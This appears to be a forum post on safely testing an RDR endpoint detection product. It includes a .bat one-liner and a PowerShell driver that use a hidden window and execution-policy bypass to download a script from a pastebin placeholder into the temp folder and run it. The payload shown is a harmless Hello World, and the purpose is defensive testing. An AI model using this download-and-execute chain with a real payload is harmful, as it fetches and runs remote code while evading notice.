RDR testing tips
Let's start a topic for RDR testing tips of the day: ways to safely simulate an attack that generates detections.
As you probably know, testing RDR against some simple detections can be as easy as opening a command prompt and running "whoami" on a target endpoint. However, you can also safely try something more advanced with PowerShell.
We will create a .bat file that calls PowerShell to download a script from a third-party website, in this case pastebin.com, where the paste contains the following harmless code:
# Filename: Hello.ps1
Write-Host
Write-Host 'Hello World!'
Write-Host
# end of script
1. Create a hello-world.bat file
2. Add the following two commands, one per line (the URL argument of the original one-liner was cut off; replace the placeholder with the "raw" link of your own paste):
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('<raw URL of your paste>', (Join-Path $env:Temp 'powershell.ps1'))"
Powershell.exe -executionpolicy remotesigned -File "%TEMP%\powershell.ps1"
Two things to note. DownloadFile writes the file to disk and returns nothing, so there is nothing for IEX to evaluate; the download and the execution are separate stages. And because the second command is run by cmd, not PowerShell, the temp folder must be written as %TEMP%; $env:Temp is not expanded by cmd, and the -File parameter takes the path literally.
3. Save the file and run it on an endpoint that has the RDR client installed, then check the RDR console for the resulting detection (PowerShell launched with a hidden window and policy bypass, a script downloaded to the temp folder, and a script executed from there).
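The same test, reworked as a single PowerShell driver so it can be re-run and correlated with what the console shows. This is an added example, not code from the original post: the pastebin URL is a placeholder you must replace with the raw link of your own paste, and the -Offline switch (also an assumption, not in the post) writes the Hello.ps1 content locally instead of downloading it, so the execution stage can be exercised without network access. It records the start time, the SHA-256 of the staged file and the child process ID, which are the facts you need when looking up the alert.

```powershell
<#
 Added example (not part of the original post): runs the download-and-execute
 test from the steps above and prints the details needed to match the alert.

 Assumptions not in the original post:
   - $Url is the "raw" link of your own pastebin paste holding Hello.ps1;
     the placeholder must be replaced, no real paste is referenced here.
   - -Offline writes a constructed copy of Hello.ps1 locally instead of
     downloading it, so the execution stage can be tested without network.
#>
param(
    [string]$Url = 'https://pastebin.com/raw/<YOUR-PASTE-ID>',   # placeholder, replace
    [switch]$Offline
)

$ErrorActionPreference = 'Stop'
$target = Join-Path $env:TEMP 'powershell.ps1'

# Stage 1: stage the script in %TEMP%, either downloaded or constructed locally.
if ($Offline) {
    # Constructed stand-in for the paste; identical to the Hello.ps1 in the post.
    @"
# Filename: Hello.ps1
Write-Host
Write-Host 'Hello World!'
Write-Host
# end of script
"@ | Set-Content -Path $target -Encoding ASCII
} else {
    if ($Url -like '*<YOUR-PASTE-ID>*') {
        throw 'Replace the placeholder URL with the raw link of your own paste.'
    }
    # Same API the .bat uses; WebClient writes straight to disk and returns nothing.
    (New-Object System.Net.WebClient).DownloadFile($Url, $target)
}

# Record what actually landed on disk so the alert can be tied to this exact file.
$hash    = (Get-FileHash -Path $target -Algorithm SHA256).Hash
$started = Get-Date

# Stage 2: execute with the switches detections typically key on
# (no profile, non-interactive, hidden window, policy bypass, script in the temp folder).
$psExe = Join-Path $env:SystemRoot 'System32\WindowsPowerShell\v1.0\powershell.exe'
$child = Start-Process -FilePath $psExe `
    -ArgumentList '-NoP', '-NonI', '-W', 'Hidden', '-Exec', 'Bypass', '-File', "`"$target`"" `
    -PassThru -Wait

# Stage 3: print the facts to compare against the RDR console.
[pscustomobject]@{
    Started    = $started.ToString('o')
    ScriptPath = $target
    Sha256     = $hash
    ChildPid   = $child.Id
    ExitCode   = $child.ExitCode
    Parent     = (Get-Process -Id $PID).ProcessName
}

# Clean up the test artifact so it is not picked up by a later scan by mistake.
Remove-Item -Path $target -Force
```

Run it as `.\Invoke-RdrTest.ps1 -Offline` first to confirm the execution stage alone triggers something, then with `-Url` to add the download stage; comparing the two runs tells you which part of the chain the detection actually fires on.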